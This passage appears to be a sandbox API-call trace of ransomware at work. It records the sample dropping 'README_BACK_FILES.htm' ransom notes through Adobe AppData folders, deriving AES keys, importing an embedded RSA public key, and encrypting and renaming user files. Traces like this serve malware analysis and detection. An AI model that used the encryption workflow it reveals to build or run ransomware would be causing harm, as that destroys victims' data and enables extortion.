lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d14 [0242.190] GetFileType (hFile=0x5d14) returned 0x1 [0242.190] WriteFile (in: hFile=0x5d14, lpBuffer=0x2b9d45c*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d454, lpOverlapped=0x0 | out: lpBuffer=0x2b9d45c*, lpNumberOfBytesWritten=0x2b9d454*=0x5ec, lpOverlapped=0x0) returned 1 [0242.191] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0242.191] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x282de78 [0242.191] FindNextFileA (in: hFindFile=0x282de78, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0242.192] FindNextFileA (in: hFindFile=0x282de78, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0242.192] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x282e3b8 [0242.192] FindNextFileA (in: hFindFile=0x282e3b8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0242.192] FindNextFileA (in: hFindFile=0x282e3b8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0242.192] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x282df78 [0242.195] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0242.195] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0242.195] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\*.*", lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0x28e7978 [0242.196] FindNextFileA (in: hFindFile=0x28e7978, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0242.196] FindNextFileA (in: hFindFile=0x28e7978, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0242.196] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\*.*", lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0x28e7df8 [0242.202] FindNextFileA (in: hFindFile=0x28e7df8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0242.202] FindNextFileA (in: hFindFile=0x28e7df8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0242.202] FindNextFileA (in: hFindFile=0x28e7df8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0242.202] FindNextFileA (in: hFindFile=0x28e7df8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0242.202] FindNextFileA (in: hFindFile=0x28e7df8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0242.202] FindNextFileA (in: hFindFile=0x28e7df8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0242.202] FindNextFileA (in: hFindFile=0x28e7df8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0 [0242.202] FindClose (in: hFindFile=0x28e7df8 | out: hFindFile=0x28e7df8) returned 1 [0242.202] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrocef\\dc\\acrobat\\cache\\cache\\readme_back_files.htm")) returned 0xffffffff [0242.203] AreFileApisANSI () returned 1 [0242.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0242.203] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrocef\\dc\\acrobat\\cache\\cache\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d9a0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0242.205] GetFileType (hFile=0x5d48) returned 0x1 [0242.205] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9c5ec*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c5e4, lpOverlapped=0x0 | out: lpBuffer=0x2b9c5ec*, lpNumberOfBytesWritten=0x2b9c5e4*=0x5ec, lpOverlapped=0x0) returned 1 [0242.207] FindNextFileA (in: hFindFile=0x28e7978, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0242.207] FindNextFileA (in: hFindFile=0x28e7978, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0 [0242.207] FindClose (in: hFindFile=0x28e7978 | out: hFindFile=0x28e7978) returned 1 [0242.207] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrocef\\dc\\acrobat\\cache\\readme_back_files.htm")) returned 0xffffffff [0242.207] AreFileApisANSI () returned 1 [0242.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0242.207] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrocef\\dc\\acrobat\\cache\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9dd3c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0242.208] GetFileType (hFile=0x5d40) returned 0x1 [0242.208] WriteFile (in: hFile=0x5d40, lpBuffer=0x2b9c988*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c980, lpOverlapped=0x0 | out: lpBuffer=0x2b9c988*, lpNumberOfBytesWritten=0x2b9c980*=0x5ec, lpOverlapped=0x0) returned 1 [0242.210] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0242.210] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cookie\\*.*", lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0x28e7978 [0242.210] FindNextFileA (in: hFindFile=0x28e7978, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0242.210] FindNextFileA (in: hFindFile=0x28e7978, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0242.210] FindNextFileA (in: hFindFile=0x28e7978, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0242.210] FindNextFileA (in: hFindFile=0x28e7978, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0 [0242.210] FindClose (in: hFindFile=0x28e7978 | out: hFindFile=0x28e7978) returned 1 [0242.210] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cookie\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrocef\\dc\\acrobat\\cookie\\readme_back_files.htm")) returned 0xffffffff [0242.210] AreFileApisANSI () returned 1 [0242.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28895b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0242.210] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cookie\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrocef\\dc\\acrobat\\cookie\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9dd3c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0242.211] GetFileType (hFile=0x5d40) returned 0x1 [0242.211] WriteFile (in: hFile=0x5d40, lpBuffer=0x2b9c988*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c980, lpOverlapped=0x0 | out: lpBuffer=0x2b9c988*, lpNumberOfBytesWritten=0x2b9c980*=0x5ec, lpOverlapped=0x0) returned 1 [0242.212] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0242.212] FindClose (in: hFindFile=0x282df78 | out: hFindFile=0x282df78) returned 1 [0242.212] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrocef\\dc\\acrobat\\readme_back_files.htm")) returned 0xffffffff [0242.212] AreFileApisANSI () returned 1 [0242.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28895b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0242.212] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrocef\\dc\\acrobat\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0242.213] GetFileType (hFile=0x5d44) returned 0x1 [0242.213] WriteFile (in: hFile=0x5d44, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0242.214] FindNextFileA (in: hFindFile=0x282e3b8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0242.214] FindClose (in: hFindFile=0x282e3b8 | out: hFindFile=0x282e3b8) returned 1 [0242.215] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrocef\\dc\\readme_back_files.htm")) returned 0xffffffff [0242.215] AreFileApisANSI () returned 1 [0242.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6bb8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0242.215] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrocef\\dc\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0242.215] GetFileType (hFile=0x5d3c) returned 0x1 [0242.215] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0242.217] FindNextFileA (in: hFindFile=0x282de78, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0242.217] FindClose (in: hFindFile=0x282de78 | out: hFindFile=0x282de78) returned 1 [0242.217] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrocef\\readme_back_files.htm")) returned 0xffffffff [0242.217] AreFileApisANSI () returned 1 [0242.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6dc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0242.217] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrocef\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d14 [0242.218] GetFileType (hFile=0x5d14) returned 0x1 [0242.218] WriteFile (in: hFile=0x5d14, lpBuffer=0x2b9d45c*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d454, lpOverlapped=0x0 | out: lpBuffer=0x2b9d45c*, lpNumberOfBytesWritten=0x2b9d454*=0x5ec, lpOverlapped=0x0) returned 1 [0242.219] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0242.219] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28e7978 [0242.220] FindNextFileA (in: hFindFile=0x28e7978, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0242.220] FindNextFileA (in: hFindFile=0x28e7978, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0242.220] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0242.220] GetLastError () returned 0x0 [0242.220] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\ACECache11.lst" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\acecache11.lst")) returned 0x20 [0242.237] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\ACECache11.lst", dwFileAttributes=0x80) returned 1 [0242.237] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\ACECache11.lst" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\acecache11.lst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0242.238] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\ACECache11.lst.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\acecache11.lst.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0242.238] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\ACECache11.lst.gsg", dwFileAttributes=0x2) returned 1 [0242.239] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f6348) returned 1 [0242.241] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0242.242] lstrlenA (lpString="cjCYuiydaGDqRLBosfDTjZpnzMlQm") returned 29 [0242.242] CryptHashData (hHash=0x28e7d78, pbData=0x2857268, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0242.242] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e7d78, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e7df8) returned 1 [0242.242] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0242.242] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0242.242] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f4368) returned 1 [0242.242] CryptImportPublicKeyInfo (in: hCryptProv=0x28f4368, dwCertEncodingType=0x1, pInfo=0x2936a30*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2936a60*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2936a68*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e82b8) returned 1 [0242.242] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0242.242] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f4478*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f4478*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0242.243] WriteFile (in: hFile=0x5d44, lpBuffer=0x28f4478*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x28f4478*, lpNumberOfBytesWritten=0x2b9d5a0*=0x80, lpOverlapped=0x0) returned 1 [0242.244] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.259] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.259] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.264] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x10c, lpOverlapped=0x0) returned 1 [0242.264] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10c, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x110) returned 1 [0242.264] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x110, lpOverlapped=0x0) returned 1 [0242.264] CloseHandle (hObject=0x5d3c) returned 1 [0242.264] CloseHandle (hObject=0x5d44) returned 1 [0242.265] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\ACECache11.lst.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\acecache11.lst.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\ACECache11.lst" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\acecache11.lst"), bFailIfExists=0) returned 1 [0242.269] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\ACECache11.lst", dwFileAttributes=0x0) returned 1 [0242.270] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\ACECache11.lst.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\acecache11.lst.gsg")) returned 1 [0242.271] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\ACECache11.lst" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\acecache11.lst"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\ACECache11.lst.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\acecache11.lst.fuck")) returned 1 [0242.272] CryptDestroyHash (hHash=0x28e7d78) returned 1 [0242.272] CryptDestroyKey (hKey=0x28e7df8) returned 1 [0242.272] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0242.272] FindNextFileA (in: hFindFile=0x28e7978, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0242.272] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x28bee18 [0242.273] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0242.273] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0242.273] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0242.273] GetLastError () returned 0x0 [0242.273] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\profiles\\wscrgb.icc")) returned 0x20 [0242.273] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc", dwFileAttributes=0x80) returned 1 [0242.274] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\profiles\\wscrgb.icc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0242.274] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\profiles\\wscrgb.icc.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0242.274] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc.gsg", dwFileAttributes=0x2) returned 1 [0242.275] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28f6348) returned 1 [0242.277] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0242.277] lstrlenA (lpString="cjCYuiydaGDqRLBosfDTjZpnzMlQm") returned 29 [0242.277] CryptHashData (hHash=0x28bf018, pbData=0x28570d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0242.277] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28bf018, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28e8078) returned 1 [0242.277] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0242.277] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0242.277] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28f4500) returned 1 [0242.278] CryptImportPublicKeyInfo (in: hCryptProv=0x28f4500, dwCertEncodingType=0x1, pInfo=0x2936210*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2936240*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2936248*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28e7d78) returned 1 [0242.278] CryptEncrypt (in: hKey=0x28e7d78, hHash=0x0, 